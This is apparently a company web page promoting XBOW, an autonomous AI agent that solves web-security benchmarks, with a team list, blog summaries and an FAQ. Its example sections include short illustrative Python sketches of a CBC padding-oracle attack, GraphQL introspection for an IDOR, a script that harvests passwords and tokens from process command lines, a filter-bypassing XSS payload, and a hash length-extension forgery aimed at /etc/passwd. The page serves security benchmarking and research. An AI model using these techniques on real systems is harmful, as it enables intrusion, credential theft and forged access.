Boosting offensive security with AI
XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
PortSwigger Labs
PentesterLab Exercises
Novel Benchmarks
See XBOW at work
XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.
These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data, click here.
Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle
Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classic Padding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able to decrypt the secret one byte at a time and use it to register a new user.
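For readers curious about how such an attack works, here is a minimal Python sketch of the byte-by-byte decryption loop at the heart of a CBC padding oracle attack. The oracle function stands in for the app's cookie check and the 16-byte block size is assumed; this is an illustration of the general technique, not XBOW's actual exploit code.

def padding_oracle_decrypt_block(prev_block, block, oracle, block_size=16):
    # Recover the plaintext of `block` one byte at a time, right to left,
    # by asking the oracle whether a crafted ciphertext has valid padding.
    intermediate = bytearray(block_size)
    for pad_val in range(1, block_size + 1):
        pos = block_size - pad_val
        for guess in range(256):
            fake_prev = bytearray(block_size)
            fake_prev[pos] = guess
            # Force the already-recovered tail bytes to decrypt to pad_val.
            for i in range(pos + 1, block_size):
                fake_prev[i] = intermediate[i] ^ pad_val
            if oracle(bytes(fake_prev) + block):
                # Valid padding means D(block)[pos] == guess ^ pad_val.
                intermediate[pos] = guess ^ pad_val
                break
    # XOR with the real previous ciphertext block to reveal the plaintext.
    # (The rare false positive on the final byte is ignored in this sketch.)
    return bytes(i ^ p for i, p in zip(intermediate, prev_block))

Repeating this for every block of the cookie, with each block's predecessor as prev_block, decrypts the whole secret without ever knowing the AES key.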
Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API
Even when we entirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site—finding one that holds the flag.
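To give a flavour of the introspection step (the endpoint, session cookie, and field names below are hypothetical, not taken from the benchmark), a client can simply ask a GraphQL server to describe its own schema:

import requests

# Standard GraphQL introspection query: enumerate every type and its fields.
INTROSPECTION_QUERY = """
{
  __schema {
    queryType { name }
    types { name fields { name } }
  }
}
"""

resp = requests.post(
    "http://target.example/graphql",   # hypothetical endpoint
    json={"query": INTROSPECTION_QUERY},
    cookies={"session": "..."},        # the guessed user's session
)
for t in resp.json()["data"]["__schema"]["types"]:
    if not t["name"].startswith("__"):
        print(t["name"], [f["name"] for f in (t["fields"] or [])])

Once the schema reveals a query that takes a user or prescription ID, the IDOR is a matter of substituting other users' IDs into that query.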
Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit
After a benchmark bug made this "Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but the compromised server as well. Its final solution is a thing of beauty: a Python program that exploits XML deserialization to deploy an embedded bash script, stealing secrets from the command lines of running processes.
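The final harvesting step, reading secrets out of running processes' command lines, is conceptually simple on Linux because /proc exposes every process's argument vector. A stand-alone Python sketch of that idea (not XBOW's actual payload; the keyword list is an assumption):

import glob

# /proc/<pid>/cmdline holds the NUL-separated argument vector of each process;
# credentials passed as command-line flags are visible to any local reader.
for path in glob.glob("/proc/[0-9]*/cmdline"):
    try:
        raw = open(path, "rb").read()
    except OSError:
        continue  # process exited or access was denied
    args = [a.decode(errors="replace") for a in raw.split(b"\0") if a]
    if any("password" in a.lower() or "token" in a.lower() for a in args):
        print(path, " ".join(args))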
Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)
In this novel XBOW benchmark, XBOW detects one of the most common vulnerabilities in the OWASP Top 10: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW finds a bypass and exploits the XSS using HTML entity encoding.
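The encoding trick exploits the order in which browsers process markup: attribute values are HTML-entity-decoded before they reach the JavaScript engine, so a blocklist that scans for literal strings never sees the decoded payload. A hypothetical Python sketch of the idea (the filter and payload here are illustrative, not the benchmark's):

payload_js = "alert(document.domain)"
# Encode every character as a decimal HTML character reference.
encoded = "".join(f"&#{ord(c)};" for c in payload_js)
html = f'<img src=x onerror="{encoded}">'
# A naive blocklist looking for "alert" passes this string untouched,
# yet the browser decodes the onerror attribute back into runnable JavaScript.
assert "alert" not in html
print(html)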
Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature via a hash length extension attack, all without access to the tutorial given to human solvers.
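The essence of a length extension attack is that SHA-256's output is its entire internal state, so knowing H(secret || message) and len(secret) lets an attacker keep hashing as if the secret were in hand. A minimal Python sketch of the message-forging half (the digest-resumption step requires the kind of from-scratch SHA-256 described above, whose compression state can be seeded, and is omitted here):

def sha256_glue_padding(total_len: int) -> bytes:
    # The padding SHA-256 appends internally: 0x80, zero bytes, then the
    # 64-bit big-endian bit length of everything hashed so far.
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + (total_len * 8).to_bytes(8, "big")

def forge_message(message: bytes, extension: bytes, secret_len: int) -> bytes:
    # The server signed H(secret || message).  Appending the exact padding the
    # hash would have used, then our extension, yields a message whose valid
    # signature can be computed by resuming SHA-256 from the known digest.
    glue = sha256_glue_padding(secret_len + len(message))
    return message + glue + extension

# Hypothetical usage against a signature over a file path:
# forged = forge_message(b"reports/summary.pdf", b"/../../etc/passwd", secret_len=16)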
Team
Security, AI, and Engineering
Nico Waisman
Head of Security
Albert Ziegler
Head of AI
Andrew Rice
Head of Engineering
Aqeel Siddiqui
Head of Operations
Brendan Coll
Research Engineer
Brendan Dolan-Gavitt
AI Researcher
Diego Jurado
Security Researcher
Ewan Mellor
Research Engineer
Fernando Russ
Research Engineer
Johan Rosenkilde
AI Researcher
Joel Noguera
Security Researcher
Thomas Bolton
AI Researcher
We are recruiting.
Email us
Blog
Updates and opinions from the team
September 11, 2024 - By Nico Waisman
XBOW validation benchmarks: show me the numbers!
XBOW is currently making 104 benchmarks available to the public. This allows other security vendors, tool builders, and researchers to use and explore these benchmarks.
Read post
August 5, 2024 - By Oege de Moor
XBOW now matches the capabilities of a top human pentester
Five professional pentesters were asked to find and exploit the vulnerabilities in 104 realistic web security benchmarks. The most senior of them, with over twenty years of experience, solved 85% in 40 hours, while the others scored 59% or less. XBOW also scored 85%, but did so in 28 minutes. This illustrates how XBOW can boost offensive security teams, freeing them to focus on the most interesting and challenging parts of their job.
Read post
July 30, 2024 - By Oege de Moor
Sequoia Capital leads $20M seed round in XBOW
XBOW scales offensive security through AI, boosting the work of pentesters, bug hunters and offensive security researchers. It autonomously solves 75% of web app security benchmarks. Sequoia Capital is leading a $20M seed round in XBOW.
Read post
Frequently asked questions
Benchmarks
What do you consider a “benchmark”?
A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Many challenges in CTF contests do not qualify because they are brainteasers rather than realistic web security scenarios.
Where did XBOW get its collection of benchmarks?
XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources include leading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Some benchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.
The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?
The PortSwigger labs automatically detect whether you have solved them. However, we wanted all benchmarks to share the same crisp success criterion, one that our infrastructure can check, so we introduced a flag and a mechanism for returning it.
Could you provide more information about the novel XBOW benchmarks?
XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in any training data. The benchmarks cover many vulnerability classes and a range of difficulty levels.
Will the novel XBOW benchmarks be released?
Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarks to set a new standard for the evaluation of security tools.
How many benchmarks does XBOW have?
XBOW has collected a corpus of thousands of benchmarks, both for evaluating performance and for improving it.
Where can I find more details about the benchmarks that XBOW solved?
We provide more details to back up the results reported on this website. See here for which benchmarks were attempted and which were solved.
Technology
How does the AI inside XBOW work?
It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Aside from general guidance that is identical for every task, the only direction given to XBOW is the benchmark description.
As a growing startup, this intellectual property is our main asset, so we cannot share the details.
Are the example traces shown edited?
The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.
Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?
Yes. We have run experiments with the descriptions blanked out, and XBOW still solves the benchmarks. Without flags as a goal, XBOW decides on its own when it has finished. You can prompt it to be more or less aggressive: for example, when it discovers a SQL injection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or simply stop and report the core problem.
Is XBOW useful for everyone or does it require any sort of specific knowledge?
XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security or AI expert to use it; a lot of deep security knowledge is baked into the XBOW product. That is the magic of our team, which combines security expertise with AI and engineering skills.
Responsible AI
How will you ensure your technology won't be misused?
We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone application outside our control.